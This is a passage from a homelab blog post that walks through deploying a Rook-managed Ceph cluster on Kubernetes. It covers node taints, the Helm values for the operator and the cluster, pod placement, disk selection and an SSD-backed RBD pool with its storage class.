</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kubeletExtraArgs</span>:
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% if &#39;kube_ceph&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab/role=ceph&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_controllers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab/role=controller&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% elif &#39;kube_workers&#39; in group_names %}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">node-labels</span>: <span style="color:#e6db74">&#34;homelab/role=worker&#34;</span>
</span></span><span style="display:flex;"><span>{<span style="color:#ae81ff">% endif %}</span>
</span></span></code></pre></div><p>This file is put through Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/template_module.html">Template module</a>
during initial host setup, and I&rsquo;m then just joining the node to the cluster
via <code>kubeadm join --config /path/to/join.yaml</code>. Here, the <code>homelab/taint.role=ceph</code>
taint is added to all Ceph hosts, which are in my <code>kube_ceph</code> Ansible group.</p>
<p>Depending on which parts of Ceph you would like to use, you will also need to
make sure that all nodes (not just the Ceph nodes) have the <code>rbd</code> and <code>ceph</code>
kernel modules.</p>
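<p>On a typical systemd host, making sure those modules are available and stay loaded
across reboots takes just a couple of commands (the file name under
<code>modules-load.d</code> is arbitrary):</p>
<pre tabindex="0"><code># load the modules right now
modprobe rbd
modprobe ceph
# and have systemd load them again on every boot
printf &#39;rbd\nceph\n&#39; &gt; /etc/modules-load.d/ceph.conf
</code></pre>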
<h1 id="rook-operator-setup">Rook operator setup</h1>
<p>As always, I&rsquo;m constructing my setup by reading through the default
<a href="https://github.com/rook/rook/blob/master/deploy/charts/rook-ceph/values.yaml">values.yaml file</a>.</p>
<p>But before looking at the config, let&rsquo;s look at what the operator actually
does: It takes the Ceph Rook CRDs and creates a full Ceph cluster from
them, including all the daemons necessary to run it. It also
takes care of changes in the CRDs, starting new daemons and re-configuring
or deleting existing ones.</p>
<p>My configuration is rather simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/role</span>: <span style="color:#ae81ff">ceph</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">priorityClassName</span>: <span style="color:#ae81ff">system-cluster-critical</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">csi</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enableMetadata</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterName</span>: <span style="color:#ae81ff">k8s-rook</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provisionerTolerations</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nfs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">enableDiscoveryDaemon</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">discoveryDaemonInterval</span>: <span style="color:#ae81ff">6h</span>
</span></span></code></pre></div><p>There&rsquo;s not actually that much to configure in the operator itself. Most of
the Ceph config is done in the next chart, which defines the cluster proper.</p>
<p>First of all, I&rsquo;m defining some scheduling constraints for the operator pod.
It should tolerate the previously mentioned <code>NoSchedule</code> taint on Ceph nodes
and also gets a <code>nodeSelector</code> for those nodes. Furthermore, I&rsquo;m assigning it
the highest scheduling <a href="https://kubernetes.io/docs/concepts/scheduling-eviction/pod-priority-preemption/#priorityclass">PriorityClass</a>.
I&rsquo;m not entirely sure this is really necessary, though. I&rsquo;ve just done it out of
reflex, because Ceph is pretty important in my Homelab stack. The operator
itself isn&rsquo;t that important once the cluster has been initialized; it only
becomes important again when the cluster CRDs change and it has to apply those changes.</p>
<p>Then there are the CSI configs. In short, CSI is the <a href="https://github.com/container-storage-interface/spec">Container Storage Interface</a>, a standard for supplying storage to workloads. It&rsquo;s not
Kubernetes specific, although most implementations have been developed for k8s.
I&rsquo;m using <a href="https://github.com/ceph/ceph-csi">Ceph&rsquo;s CSI driver</a> on my Nomad
cluster, for example.
It consists of two parts. One is the provisioner, which manages the volumes and
talks to the Ceph and k8s clusters. The second part is a pod on each node,
which is mostly concerned with mounting the actual volumes when a pod running
on that node needs them.</p>
<p>I&rsquo;m defining the Ceph <code>NoSchedule</code> toleration here again, because the
provisioner is another piece of infrastructure I want to allow to run on the Ceph nodes. But
I&rsquo;m not adding a <code>nodeSelector</code> for the Ceph nodes, because I don&rsquo;t want to
completely overload them, and it doesn&rsquo;t matter much where the provisioners
run. While initially writing this, I had the following additional line
under the <code>csi</code> key in the <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">provisionerNodeAffinity</span>: <span style="color:#e6db74">&#34;homelab/role=ceph;&#34;</span>
</span></span></code></pre></div><p>But then, while writing a couple of things about which pods are deployed by
the operator, I realized that one of my MGR pods was in the pending state -
no space left on the two Ceph nodes. So I ended up removing the node affinity
for the provisioner pods, which balanced everything out again.</p>
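<p>As an aside: the provisioner is only one half of the CSI machinery. For the per-node plugin pods, the chart exposes analogous keys; at least in the chart versions I&rsquo;ve looked at, there is a <code>pluginTolerations</code> list. I haven&rsquo;t needed it, since nothing but Ceph itself runs on my tainted nodes, but if workloads with volumes ever had to run there, it would presumably look like this:</p>
<pre tabindex="0"><code class="language-yaml" data-lang="yaml">csi:
  pluginTolerations:
    - key: "homelab/taint.role"
      operator: "Equal"
      value: "ceph"
      effect: "NoSchedule"
</code></pre>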
<p>As in previous charts, I&rsquo;m explicitly disabling the metrics gathering, which I
will look at again later.</p>
<p>Finally, the <code>enableDiscoveryDaemon</code> and <code>discoveryDaemonInterval</code> configs
are related to dashboard functionality. As I&rsquo;ve shown above, the dashboard does
not show all disks at the moment. But without these options, the entire
<code>Physical Disks</code> page would be empty.</p>
<p>Okay. While looking at the pods in the operator namespace to verify which were
launched by the operator before any cluster was defined, I realized why I&rsquo;m not
getting any data on disks from my Ceph hosts: I did not set the Ceph <code>NoSchedule</code>
toleration on the discovery daemon containers. &#x1f926;</p>
<p>Here is what the &ldquo;Physical Disks&rdquo; page of the dashboard looked like up to now:</p>
<figure>
    <img loading="lazy" src="physical-disks.png"
         alt="A screenshot of the Ceph dashboard&#39;s UI. The table is headed &#39;Physical Disks&#39;. The &#39;Hostname&#39; column is blurred out. There are nine lines overall. The &#39;Size&#39; column contains only entries ranging for 4MB to 50 GB."/> <figcaption>
            <p>The physical disks list of the Ceph Dashboard. Note that this list doesn&rsquo;t contain any of my Ceph hosts, so none of the disks actually used as OSDs at the time this screenshot was taken are shown.</p>
        </figcaption>
</figure>

<p>After the above realization, I&rsquo;ve added the following into the operator
<code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">discover</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span></code></pre></div><p>This makes the disks visible:</p>
<figure>
    <img loading="lazy" src="appearing-disks.png"
         alt="A screenshot of the Ceph dashboard&#39;s UI. It shows a table of four disks. Two of them have &#39;QEMU&#39; as the vendor and &#39;QEMU HARDDISK&#39; as the Model. One is 8 TB in size, and one 2 TB. The third line has the model &#39;Samsung SSD 870&#39; and is 1 TB in size. The last line has a string of alphanumerics as the &#39;Model&#39; and a size of 4 TB."/> <figcaption>
            <p>The physical disks in my Ceph nodes finally appeared.</p>
        </figcaption>
</figure>

<p>Once the Helm chart for the operator is deployed, it will create a pod for the
operator itself as well as pods for the enabled CSI provisioners. In my case,
these are the RBD and CephFS provisioners.
Note that at this point, the actual Ceph cluster is not yet defined. None of
the Ceph daemons have been created, as the cluster is only defined in the next
chart.</p>
<h1 id="rook-cluster-setup">Rook cluster setup</h1>
<p>Now that the operator is running, I could create the actual Ceph cluster. This
is done via a separate Helm chart which can be found <a href="https://github.com/rook/rook/tree/master/deploy/charts/rook-ceph-cluster">here</a>.</p>
<p>This chart sets up the cluster with all its daemons, like the MONs, OSDs and
so forth. It can also be used to create pools for RBD, CephFS and RGW usage and
storage classes to make those available in the k8s cluster.</p>
<p>I will discuss my <code>values.yaml</code> file in pieces, to make it more manageable.</p>
<p>Let&rsquo;s start with some housekeeping:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">clusterName</span>: <span style="color:#ae81ff">k8s-rook</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">operatorNamespace</span>: <span style="color:#ae81ff">rook-ceph</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">toolbox</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Here I&rsquo;m supplying a cluster name (you know, just in case I end up running
multiple clusters one day &#x1f609;) and I set the namespace into which I deployed
the operator.</p>
<p>In addition, I&rsquo;m disabling the <code>toolbox</code>. This is a pod which can be used to
run Ceph commands against the cluster. But I don&rsquo;t need it, as I&rsquo;m using the
rook-ceph <code>kubectl</code> plugin, which I will show later.
I&rsquo;m also disabling monitoring here, as I haven&rsquo;t deployed Prometheus yet.</p>
<p>Then let&rsquo;s start with the cluster spec:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephClusterSpec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mgr</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">modules</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pg_autoscaler</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">devicehealth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">diskprediction_local</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ssl</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">network</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">provider</span>: <span style="color:#ae81ff">host</span>
</span></span></code></pre></div><p>Here I&rsquo;m enabling a couple of modules. The <code>pg_autoscaler</code> can automatically
scale up and down the <a href="https://docs.ceph.com/en/reef/rados/operations/placement-groups/">placement groups</a>
in the cluster. <code>devicehealth</code> is pretty much what it says on the tin - it
enables gathering SMART data. The <code>diskprediction_local</code> module is a related
tool, which uses the SMART data to make some guesses on how long your disks
still have to live at current usage. Docs can be found <a href="https://docs.ceph.com/en/quincy/mgr/diskprediction/">here</a>.
Finally, the <code>rook</code> module hooks into Ceph&rsquo;s orchestrator functionality, but as
I&rsquo;ve noted <a href="#why-rook">above</a>, it doesn&rsquo;t yet implement all the
functionality of the official <a href="https://docs.ceph.com/en/latest/cephadm/">cephadm</a>
deployment tool.</p>
<p>I&rsquo;m also disabling SSL for the dashboard. The simple reason is that it&rsquo;s not going
to be reachable directly from the outside, and all the cluster-internal traffic
is secured by Cilium&rsquo;s encrypted WireGuard tunnels.</p>
<p>The <code>network.provider: host</code> config option is important. This config makes it
so that the Ceph daemons use the node&rsquo;s network, not the k8s cluster network.
So they will be reachable by all hosts in my Homelab subnet, without any routing
and without needing <code>LoadBalancer</code> services or ingresses. This is important for
me, because I don&rsquo;t just use my Ceph cluster for supplying volumes to k8s services, but also
for other things, like a mounted CephFS on my workstation and the root disks
for my Pis.</p>
<p>Next comes the placement config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">placement</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">all</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/taint.role&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Equal&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoSchedule&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mon</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">nodeAffinity</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">requiredDuringSchedulingIgnoredDuringExecution</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">nodeSelectorTerms</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>                - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span></code></pre></div><p>Nothing too exciting. Worth noting perhaps is that I force my MON daemons onto
the controller nodes. This is similar to what I&rsquo;ve got in my
baremetal/Nomad setup right now as well. The basic thought is to put the
<code>server</code> components of all of my infrastructure on the same group of three hosts.
In addition, I&rsquo;m forcing all other Ceph daemons onto the Ceph nodes. That&rsquo;s just
so I know that as long as those nodes are up, I have a fully functional Ceph
cluster, e.g. for booting all of the other nodes in the cluster, which don&rsquo;t
have any attached storage.
I&rsquo;m still not sure how well this idea is going to work out, and I will
have to do a full cluster shutdown test soonish, to make sure that the Ceph
cluster is able to come up fully and start serving requests without any other
worker node being online.</p>
<p>I&rsquo;m a bit worried about how Kubernetes is going to behave in situations like this. I hope
it will just start scheduling the Ceph pods, and then once the Ceph cluster is
healthy, I will be able to boot the diskless worker nodes.</p>
<p>And now for the storage definitions and dashboard ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">useAllNodes</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">useAllDevices</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">nodes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;node1&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/scsi-SQEMU_QEMU_HARDDISK_lxd_cephssd&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/scsi-SQEMU_QEMU_HARDDISK_lxd_cephhdd&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;node2&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-1234&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-5678&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">host</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-k8s.mei-home.net</span>
</span></span></code></pre></div><p>There are two basic options for configuring the storage. First, one can tell
Rook to use all nodes and all devices in those nodes. For me, that&rsquo;s not what
I want. I&rsquo;ve got a couple of dedicated Ceph nodes and dedicated storage inside
them. So I&rsquo;m using the setup shown here. It tells Rook to use the disks on
the two nodes <code>node1</code> and <code>node2</code>, and only those disks given here.</p>
<p>I&rsquo;m using the stable names here, instead of <code>/dev/sd*</code>. I&rsquo;m specifically using
the <code>by-id/wwn</code> numbers for the actual hard disks in my baremetal node to
ensure that I always get the correct disks. These <code>wwn-*</code> numbers are based on
the <a href="https://en.wikipedia.org/wiki/World_Wide_Name">World Wide Name</a> as provided
by the drives themselves, so they should be completely unique.
For some more details on the different ways of addressing disks, I found
<a href="https://wiki.archlinux.org/title/persistent_block_device_naming">the Arch wiki</a>
pretty useful.</p>
<p>And then there&rsquo;s also the ingress for the Ceph dashboard. Not much more than
defining which entrypoint from my Traefik Ingress it is supposed to use, and
under which domain it should be reachable.</p>
<p>One final note: You can do a lot of this setup piecemeal. Even without any nodes
in the list, you can already deploy the Helm chart, and then add the nodes
to the list as you add them to the k8s cluster. The same is true for the
next section, about the cluster pools and storage classes. I deployed the
cluster chart first without any pools defined, verified that all the base
daemons work and only then added the pools.</p>
<h1 id="setting-up-ceph-pools-and-storageclasses">Setting up Ceph pools and StorageClasses</h1>
<p>In this section, two concepts are combined. The first one is <a href="https://docs.ceph.com/en/latest/rados/operations/pools/">Ceph Pools</a>.
These are storage pools, logical slices of your underlying disks. The same
disks can be used by multiple pools; the partitioning is purely logical. Pools are
also one of the units which can be used when setting permissions for Ceph auth.</p>
<p>One of the downsides of using Rook is that pools created through Rook cannot
be shared between different applications. As noted before, Ceph can provide storage in
three forms: Block devices, CephFS as a POSIX-compatible filesystem and S3
storage. In baremetal Ceph clusters, you can run multiple apps on the same pool.
But in Rook, each pool can only be used for one of the three storage applications.
Of course you can still create pools manually via the Ceph CLI and assign them
to multiple apps. But then you lose one of Rook&rsquo;s biggest advantages: Declarative
definition of Ceph.</p>
<p>The second concept is <a href="https://kubernetes.io/docs/concepts/storage/storage-classes/">Kubernetes StorageClasses</a>.
These, similar to e.g. <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/#ingress-class">IngressClasses</a>, describe a specific form of storage that a user can request for their
pod/volume.</p>
<p>I&rsquo;m using all three storage types Ceph supplies, so I will define pools and
storage classes for all of them.</p>
<h2 id="rbds">RBDs</h2>
<p>Let&rsquo;s start with the RBD pool(s). RBDs are block devices in the Linux
sense. They&rsquo;re raw buckets of bytes and look the same to Linux as your
physical disks. In contrast to e.g. NFS exports, using them needs an extra
step though: <code>mapping</code> them, which creates the <code>/dev/foo</code> device.
This can then be formatted with a file system, mounted and so on, just like a normal
disk.
RBDs can be pretty efficient, especially with the <code>exclusive-lock</code> feature
enabled, which allows the client to assume that it never has to give up
the lock on the RBD volume once acquired, until the device is <code>unmapped</code> again.
For that reason, they&rsquo;re my default volume type. In my Rook setup, I have two pools,
with two different storage classes: one backed by my SSDs, and one backed by my
HDDs. Most volumes for my services will end up on the HDD pool, with a couple
of exceptions like databases. And yes, I&rsquo;ve been running a Postgres DB off of a
Ceph RBD volume for almost three years now, without any issues, including
power outages and the like.</p>
<p>Here, I will only show the SSD pool and storage class, as the HDD variant only
has a different name and a different <code>spec.deviceClass</code>.
So here we go:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">cephBlockPools</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replicated</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">size</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">failureDomain</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">ssd</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">min_size</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">reclaimPolicy</span>: <span style="color:#ae81ff">Retain</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowVolumeExpansion</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumeBindingMode</span>: <span style="color:#e6db74">&#34;Immediate&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">imageFeatures</span>: <span style="color:#e6db74">&#34;layering,exclusive-lock,object-map,fast-diff&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/fstype</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-name</span>: <span style="color:#ae81ff">rook-csi-rbd-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/provisioner-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-name</span>: <span style="color:#ae81ff">rook-csi-rbd-provisioner</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/controller-expand-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-name</span>: <span style="color:#ae81ff">rook-csi-rbd-node</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">csi.storage.k8s.io/node-stage-secret-namespace</span>: <span style="color:#e6db74">&#34;{{ .Release.Namespace }}&#34;</span>
</span></span></code></pre></div><p>Let&rsquo;s start with the pool. I&rsquo;m running all of my pools as replicated pools, with
size &ldquo;2&rdquo;. This way I have redundancy, including for whole-host failures via the
<code>failureDomain: host</code> setting. This forces Ceph to store both replicas of an
object on two different hosts. I&rsquo;m also setting <code>min_size: &quot;1&quot;</code>. This tells
Ceph to continue operating as normal even when one of the two replicas is gone.
That&rsquo;s a little bit unsafe, but ensures that my systems continue running, even
when the host with the other replica goes down, for maintenance or through
sheer stupidity on my side. &#x1f605;</p>
<p>Then there&rsquo;s the storage class. I&rsquo;ve got the <code>isDefault</code> option disabled for
all of my storage classes, so that I always have to explicitly choose one. I&rsquo;m
just wired in such a way that I prefer explicit values to defaults. &#x1f937;
The <code>reclaimPolicy</code> is a <strong>very</strong> important option. It determines what happens
